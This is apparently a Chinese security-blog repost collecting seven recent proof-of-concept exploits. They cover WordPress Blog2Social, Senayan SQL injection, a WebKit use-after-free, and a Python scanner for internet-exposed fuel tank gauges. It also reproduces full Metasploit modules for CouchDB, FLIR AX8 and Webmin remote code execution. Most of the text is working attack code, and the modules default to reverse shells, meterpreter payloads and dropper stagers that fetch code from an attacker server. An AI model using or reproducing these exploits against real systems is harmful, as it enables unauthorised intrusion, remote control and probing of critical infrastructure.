【漏洞仓库】0day Today Team最近发布的Poc&Exp

admin 2023年1月25日23:56:51安全新闻评论18 views17267字阅读57分33秒阅读模式

免责声明

公众号仅用于技术交流与学习,利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本公众号只是知识的搬运工,取之于民用之于民。

1.WordPress Blog2Social 6.9.11 缺少授权漏洞(CVE-2022-3622)

受影响的版本:<=6.9.11

Social Media Auto Post&Scheduler是Blog2Social/Adenion提供的一个插件,它为内容创作者提供了快速向其社交媒体帐户共享网站内容的能力。它提供了自动分享帖子以及优化的日程安排,还将其一些功能扩展到订户,使他们能够将帖子分享到自己的社交媒体帐户。不幸的是,这是不安全地实现的,使得经过身份验证的攻击者即使在没有授权的情况下也可以更新这些设置。
Poc:
/wp-admin/admin.php?page=blog2social-settings
POST /wp-admin/admin-ajax.php HTTP/1.1Host: 127.0.0.1Cookie: b2s_og_default_title=SiteTitle&b2s_og_default_desc=Just%20another%20WordPress%20site&b2s_og_default_image=&b2s_og_imagedata_active=1&b2s_og_objecttype_active=1&b2s_og_locale_active=1&b2s_og_locale=en_US&b2s_card_default_type=Summary&b2s_card_default_title=SiteTitle&b2s_card_default_desc=Just%20another%20WordPress%20site&b2s_card_default_image=&is_admin=1&version=0&action=b2s_save_social_meta_tags&b2s_security_nonce=<nonce> 

2.Senayan图书馆管理系统9.5.0 SQL注入漏洞

keywords参数存在SQL注入漏洞。
Poc:
Parameter: keywords (GET)    Type: stacked queries    Title: MySQL >= 5.0.12 stacked queries (comment)    Payload: csrf_token=a1266f4d54772e420f61cc03fe613b994f282c15271084e39c31f9267b55d50df06861&search=search&keywords=tfxgst7flvw5snn6r1b24fnyu8neev6w4v6u1uik7''')));SELECTSLEEP(5)#     Type: time-based blind    Title: MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)    Payload: csrf_token=a1266f4d54772e420f61cc03fe613b994f282c15271084e39c31f9267b55d50df06861&search=search&keywords=tfxgst7flvw5snn6r1b24fnyu8neev6w4v6u1uik7''')))RLIKE (SELECT 9971 FROM (SELECT(SLEEP(5)))bdiv)#
3.WebKit HTMLSelectElement UAF漏洞
如果HTMLSelectElement的长度设置为大于现有选项长度的值,则会创建虚拟HTMLOptionElements元素。这些HTMLOptionsElements作为原始指针存储在HTMLSelectElement::m_listItems中。当调用`surroundElements()` {1} 时,父元素(`selectElement`)的所有子元素都会被替换。第二次调用时,它将释放所有虚拟HTMLOptionElements。然而,“m_listItems”仍然保留指向所有这些释放元素的指针,当我们试图访问`selectElement.length` {2}时,会导致UAF。
Poc:
<script>function jsfuzzer() {  window.addEventListener("DOMNodeRemoved", eventhandler3);  svgvar00024.append(svgvar00021);} var i = 0;function eventhandler3() {  i++;  if (i > 1) { window.removeEventListener("DOMNodeRemoved", eventhandler3); }   var var00001 = document.createRange();  try { var00001.surroundContents(selectElement); } catch(e) { } // {1}  selectElement.length = 2; // {2}   // {3} - Need 1 of these 2 lines  console.log(selectElement.length);  //var var00170 = selectElement.item(1%selectElement.length);}</script><body onload=jsfuzzer()><svg id="svgvar00001" >  <glyph id="svgvar00021"/>  <altGlyph id="svgvar00024"/></svg><select id="selectElement">a</select>
4.自动储罐计量 (ATG) 远程配置披露漏洞利用
2015 年,Metasploit 的创建者 HD Moore 发表了一篇文章,披露了 5,800 多个可公开访问的加油站自动储罐计量器 (ATG)。除了监测泄漏外,这些系统还有助于测量液位、罐温,并在罐容积过高或达到临界低值时向操作员发出警报。美国几乎每个加油站和国际上数以万计的系统都使用 ATG。它们通常由燃油加油机、支付系统和前庭商品供应商 Veeder-Root 制造。对于这些燃料系统的远程监控,操作员通常会将 ATG 串行接口配置为面向互联网的 TCP 端口(通常设置为 TCP 10001)
Poc:
#!/usr/bin/env python3   import timeimport socket            with open("/tmp/ATG_SCAN.txt",'r') as atg_file:    for line in atg_file.read().splitlines():        try:            atg_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)            port = 10001            search_str = 'IN-TANK INVENTORY'                          msg = str('x01' + 'I20100' + 'n').encode('ascii')            atg_socket.connect((line, port))            atg_socket.send(msg)            time.sleep(.25)            response = atg_socket.recv(1024).decode()            if search_str in response:                with open("/tmp/ATG_DEVICES.txt", 'a') as file2:                    file2.write(line + "t ->tATG Devicen")            else:                continue            atg_socket.close()           except:            passatg_file.close()
5.Apache CouchDB Erlang 远程代码执行漏洞(CVE-2022-24706)
在 3.2.2 之前的 Apache CouchDB 版本中,攻击者可以在不进行身份验证的情况下访问未得到适当保护的默认安装并获得管理员权限。

### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework## class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking   include Msf::Exploit::Remote::Tcp  include Msf::Exploit::CmdStager  include Msf::Exploit::Retry  include Msf::Exploit::Powershell  prepend Msf::Exploit::Remote::AutoCheck  require 'msf/core/exploit/powershell'  require 'digest'   # Constants required for communicating over the Erlang protocol defined here:  # https://www.erlang.org/doc/apps/erts/erl_dist_protocol.html  EPM_NAME_CMD = "x00x01x6e".freeze  NAME_MSG = "[email protected]".freeze  CHALLENGE_REPLY = "x00x15rx01x02x03x04".freeze  CTRL_DATA = "[email protected]3rex".freeze  COOKIE = 'monster'.freeze  COMMAND_PREFIX = "[email protected]lwx02oswx03cmdlx00x00x00x01k".freeze   def initialize(info = {})    super(      update_info(        info,        'Name' => 'Apache Couchdb Erlang RCE',        'Description' => %q{          In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without          authenticating and gain admin privileges.        },        'Author'  => [          'Milton Valencia (wetw0rk)', # Erlang Cookie RCE discovery          '1F98D',                     # Erlang Cookie RCE exploit          'Konstantin Burov',          # Apache CouchDB Erlang Cookie exploit          '_sadshade',                 # Apache CouchDB Erlang Cookie exploit          'jheysel-r7',                # Msf Module        ],        'References' => [          [ 'EDB', '49418' ],          [ 'URL', 'https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit'],          [ 'CVE', '2022-24706'],        ],        'License' => MSF_LICENSE,        'Platform' => ['win', 'linux'],        'Payload' => {          'MaxSize' => 60000 # Due to the 16-bit nature of the cmd in the compile_cmd method        },        'Privileged' => false,        'Arch' => [ ARCH_CMD ],        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_openssl'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ARCH_X86, ARCH_X64],              'Type' => :linux_dropper,              'CmdStagerFlavor' => :wget,              'DefaultOptions' => {                'PAYLOAD' => 'linux/x86/meterpreter_reverse_tcp'              }            }          ],          [            'Windows Command',            {              'Platform' => 'win',              'Arch' => ARCH_CMD,              'Type' => :win_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'              }            }          ],          [            'Windows Dropper',            {              'Arch' => [ARCH_X86, ARCH_X64],              'Type' => :win_dropper,              'CmdStagerFlavor' => :certutil,              'DefaultOptions' => {                'PAYLOAD' => 'windows/x64/meterpreter_reverse_tcp'              }            }          ],          [            'PowerShell Stager',            {              'Arch' => [ARCH_X86, ARCH_X64],              'Type' => :psh_stager,              'CmdStagerFlavor' => :certutil,              'DefaultOptions' => {                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2022-01-21',        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      ),    )     register_options(      [        Opt::RPORT(4369)      ]    )  end   def check    erlang_ports = get_erlang_ports    # If get_erlang_ports does not return an array of port numbers, the target is not vulnerable.    return Exploit::CheckCode::Safe('This endpoint does not appear to expose any erlang ports') if erlang_ports.empty?     erlang_ports.each do |erlang_port|      # If connect_to_erlang_server returns a socket, it means authentication with the default cookie has been      # successful and the target as well as the specific socket used in this instance is vulnerable      sock = connect_to_erlang_server(erlang_port.to_i)      if sock.instance_of?(Socket)        @vulnerable_socket = sock        return Exploit::CheckCode::Vulnerable('Successfully connected to the Erlang Server with cookie: "monster"')      else        next      end    end    Exploit::CheckCode::Safe('This endpoint has an exposed erlang port(s) but appears to be a patched')  end   # Connect to the Erlang Port Mapper Daemon to collect port numbers of running Erlang servers  #  # @return [Array] An array of port numbers for discovered Erlang Servers.  def get_erlang_ports    erlang_ports = []    begin      print_status("Attempting to connect to the Erlang Port Mapper Daemon (EDPM) socket at: #{datastore['RHOSTS']}:#{datastore['RPORT']}...")      connect(true, { 'RHOST' => datastore['RHOSTS'], 'RPORT' => datastore['RPORT'] })      # request Erlang nodes      sock.put(EPM_NAME_CMD)      sleep datastore['WfsDelay']      res = sock.get_once      unless res && res.include?("x00x00x11x11name couchdb")        print_error('Did not find any Erlang nodes')        return erlang_ports      end       print_status('Successfully found EDPM socket')      res.each_line do |line|        erlang_ports << line.match(/s(d+$)/)[0]      end    rescue ::Rex::ConnectionError, ::EOFError, ::Errno::ECONNRESET => e      print_error("Error connecting to EDPM: #{e.class} #{e}")      disconnect      return erlang_ports    end    erlang_ports  end   # Attempts to connect to an erlang server with a default erlang cookie of 'monster', which is the  # default erlang cookie value in Apache CouchDB installations before 3.2.2  #  # @return [Socket] Returns a socket that is connected and already authenticated to the vulnerable Apache CouchDB Erlang Server  def connect_to_erlang_server(erlang_port)    print_status('Attempting to connect to the Erlang Server with an Erlang Server Cookie value of "monster" (default in vulnerable instances of Apache CouchDB)...')    connect(true, { 'RHOST' => datastore['RHOSTS'], 'RPORT' => erlang_port })    print_status('Connection successful')    challenge = retry_until_truthy(timeout: 60) do      sock.put(NAME_MSG)      sock.get_once(5) # ok message      sock.get_once    end    # The expected successful response from the target should start with x00x1C    unless challenge && challenge.include?("x00x1C")      print_error('Connecting to the Erlang server was unsuccessful')      return    end     challenge = challenge[9..12].unpack('N*')[0]    challenge_reply = "x00x15rx01x02x03x04"    md5 = Digest::MD5.new    md5.update(COOKIE + challenge.to_s)    challenge_reply << [md5.hexdigest].pack('H*')    sock.put(challenge_reply)    sleep datastore['WfsDelay']    challenge_response = sock.get_once     if challenge_response.nil?      print_error('Authentication was unsuccessful')      return    end    print_status('Erlang challenge and response completed successfully')     sock  rescue ::Rex::ConnectionError, ::EOFError, ::Errno::ECONNRESET => e    print_error("Error when connecting to Erlang Server: #{e.class} #{e} ")    disconnect    return  end   def compile_cmd(cmd)    msg = ''    msg << COMMAND_PREFIX    msg << [cmd.length].pack('S>')    msg << cmd    msg << "jwx04user"    payload = ("x70" + CTRL_DATA + msg)    ([payload.size].pack('N*') + payload)  end   def execute_command(cmd, opts = {})    payload = compile_cmd(cmd)    print_status('Sending payload... ')    opts[:sock].put(payload)    sleep datastore['WfsDelay']  end   def exploit_socket(sock)    case target['Type']    when :unix_cmd, :win_cmd      execute_command(payload.encoded, { sock: sock })    when :linux_dropper, :win_dropper      execute_cmdstager({ sock: sock })    when :psh_stager      execute_command(cmd_psh_payload(payload.encoded, payload_instance.arch.first), { sock: sock })    else      fail_with(Failure::BadConfig, 'Invalid target specified')    end  end   def exploit    # If the check method has already been run, use the vulnerable socket that has already been identified    if @vulnerable_socket      exploit_socket(@vulnerable_socket)    else      erlang_ports = get_erlang_ports      fail_with(Failure::BadConfig, 'This endpoint does not appear to expose any erlang ports') unless erlang_ports.instance_of?(Array)       erlang_ports.each do |erlang_port|        sock = connect_to_erlang_server(erlang_port.to_i)        next unless sock.instance_of?(Socket)         exploit_socket(sock)      end    end  endend
6.FLIR AX8 1.46.16 远程命令注入漏洞(CVE-2022-37061)
所有 FLIR AX8 热传感器相机版本(包括 1.46.16)都容易受到远程命令注入的影响。这可以被利用来通过 res.php 端点中的 id HTTP POST 参数以 root 用户身份注入和执行任意 shell 命令。该模块利用该漏洞上传和执行获取root权限的payload。
Poc:
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework## require 'rex/stopwatch' class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking   include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck   def initialize(info = {})    super(      update_info(        info,        'Name' => 'FLIR AX8 unauthenticated RCE',        'Description' => %q{          All FLIR AX8 thermal sensor cameras versions up to and including 1.46.16 are vulnerable to Remote Command Injection.          This can be exploited to inject and execute arbitrary shell commands as the root user through the id HTTP POST parameter          in the res.php endpoint.           This module uses the vulnerability to upload and execute payloads gaining root privileges.        },        'License' => MSF_LICENSE,        'Author' => [          'Thomas Knudsen (https://www.linkedin.com/in/thomasjknudsen)', # Security researcher          'Samy Younsi (https://www.linkedin.com/in/samy-younsi)', # Security researcher          'h00die-gr3y' # metasploit module        ],        'References' => [          ['CVE', '2022-37061'],          ['PACKETSTORM', '168114'],          ['URL', 'https://attackerkb.com/topics/UAZaDsQBfx/cve-2022-37061'],        ],        'DisclosureDate' => '2022-08-19',        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD, ARCH_ARMLE],        'Privileged' => true,        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_netcat'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ARCH_ARMLE],              'Type' => :linux_dropper,              'CmdStagerFlavor' => [ 'curl', 'printf' ],              'DefaultOptions' => {                'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => 80,          'SSL' => false        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )  end   def execute_command(cmd, _opts = {})    action_id = rand(1..40)    return send_request_cgi({      'method' => 'POST',      'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8',      'uri' => normalize_uri(target_uri.path, 'res.php'),      'vars_post' => {        'action' => 'alarm',        'id' => "#{action_id};#{cmd}"      }    })  rescue StandardError => e    elog("#{peer} - Communication error occurred: #{e.message}", error: e)    print_error("Communication error occurred: #{e.message}")    return nil  end   # Checking if the target is vulnerable by executing a randomized sleep to test the remote code execution  def check    print_status("Checking if #{peer} can be exploited!")    sleep_time = rand(5..10)    print_status("Performing command injection test issuing a sleep command of #{sleep_time} seconds.")    res, elapsed_time = Rex::Stopwatch.elapsed_time do      execute_command("sleep #{sleep_time}")    end     return Exploit::CheckCode::Unknown('No response received from the target!') unless res     print_status("Elapsed time: #{elapsed_time} seconds.")    return CheckCode::Safe('Failed to test command injection.') unless elapsed_time >= sleep_time     CheckCode::Vulnerable('Successfully tested command injection.')  end   def exploit    case target['Type']    when :unix_cmd      print_status("Executing #{target.name} with #{payload.encoded}")      execute_command(payload.encoded)    when :linux_dropper      print_status("Executing #{target.name}")      execute_cmdstager    end  endend
7.Webmin 1.984 文件管理器远程代码执行漏洞(CVE-2022-0824)
在 Webmin 版本 1.984 中,任何没有文件管理器模块访问权限的经过身份验证的低权限用户都可以与文件管理器功能进行交互,例如从远程 URL 下载文件和更改文件权限。通过在文件管理器中链接这些功能,可以通过精心制作的 .cgi 文件实现远程代码执行。
Poc:
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework## class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking   include Msf::Exploit::FileDropper  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::HttpServer  include Msf::Exploit::Remote::HTTP::Webmin  prepend Msf::Exploit::Remote::AutoCheck   def initialize(info = {})    super(      update_info(        info,        'Name' => 'Webmin File Manager RCE',        'Description' => %q{          In Webmin version 1.984, any authenticated low privilege user without access rights to          the File Manager module could interact with file manager functionalities such as downloading files from remote URLs and          changing file permissions. It is possible to achieve Remote Code Execution via a crafted .cgi file by chaining those          functionalities in the file manager.        },        'Author' => [          'faisalfs10x', # discovery          'jheysel-r7'   # module        ],        'References' => [          [ 'URL', 'https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/'], # exploit          [ 'URL', 'https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshell'], # exploit          [ 'CVE', '2022-0824']        ],        'License' => MSF_LICENSE,        'Platform' => 'linux',        'Privileged' => true,        'Targets' => [          [            'Automatic (Unix In-Memory)',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_memory,              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl' }            }          ]        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2022-02-26',        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS]        }      )    )     register_options(      [        OptPort.new('RPORT', [true, 'The default webmin port', 10000]),        OptString.new('USERNAME', [ true, 'The username to authenticate as', '' ]),        OptString.new('PASSWORD', [ true, 'The password for the specified username', '' ])      ]    )  end   def check    webmin_check('0', '1.984')  end   def login    webmin_login(datastore['USERNAME'], datastore['PASSWORD'])  end   def download_remote_url    print_status('Fetching payload from HTTP server')     res = send_request_cgi({      'uri' => normalize_uri(datastore['TARGETURI'], '/extensions/file-manager/http_download.cgi'),      'method' => 'POST',      'keep_cookies' => true,      'data' => 'link=' + get_uri + '.cgi' + '&username=&password=&path=%2Fusr%2Fshare%2Fwebmin',      'headers' => {        'Accept' => 'application/json, text/javascript, */*; q=0.01',        'Accept-Encoding' => 'gzip, deflate',        'Content-Type' => 'application/x-www-form-urlencoded; charset=UTF-8',        'X-Requested-With' => 'XMLHttpRequest',        'Referer' => 'http://' + datastore['RHOSTS'] + ':' + datastore['RPORT'].to_s + '/filemin/?xnavigation=1'      },      'vars_get' => {        'module' => 'filemin'      }    })     fail_with(Failure::UnexpectedReply, 'Unable to download .cgi payload from http server') unless res    fail_with(Failure::BadConfig, 'please properly configure the http server, it could not be found by webmin') if res.body.include?('Error: No valid URL supplied!')    register_file_for_cleanup("/usr/share/webmin/#{@file_name}")  end   def modify_permissions    print_status('Modifying the permissions of the uploaded payload to 0755')    res = send_request_cgi({      'uri' => normalize_uri(target_uri.path, '/extensions/file-manager/chmod.cgi'),      'method' => 'POST',      'keep_cookies' => true,      'headers' => {        'Referer' => 'http://' + datastore['RHOSTS'] + ':' + datastore['RPORT'].to_s + 'filemin/?xnavigation=1'      },      'vars_get' => {        'module' => 'filemin',        'page' => '1',        'paginate' => '30'      },      'vars_post' => {        'name' => @file_name,        'perms' => '0755',        'applyto' => '1',        'path' => '/usr/share/webmin'      }    })    fail_with(Failure::UnexpectedReply, 'Unable to modify permissions on the upload .cgi payload') unless res && res.code == 302  end   def exec_revshell    res = send_request_cgi(      'method' => 'GET',      'keep_cookies' => true,      'uri' => normalize_uri(datastore['TARGETURI'], @file_name),      'headers' => {        'Connection' => 'keep-alive'      }    )     fail_with(Failure::UnexpectedReply, 'Unable to execute the .cgi payload') unless res && res.code == 500  end   def on_request_uri(cli, request)    print_status("Request '#{request.method} #{request.uri}'")    print_status('Sending payload ...')    send_response(cli, payload.encoded,                  'Content-Type' => 'application/octet-stream')  end   def exploit    start_service    @file_name = (get_resource.gsub('/', '') + '.cgi')    cookie = login    fail_with(Failure::BadConfig, 'Unsuccessful login attempt with creds') if cookie.empty?    print_status('Downloading remote url')    download_remote_url    print_status('Finished downloading remote url')    modify_permissions    exec_revshell  endend

原文始发于微信公众号(Hack All):【漏洞仓库】0day Today Team最近发布的Poc&Exp

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年1月25日23:56:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  【漏洞仓库】0day Today Team最近发布的Poc&Exp http://cn-sec.com/archives/1403577.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: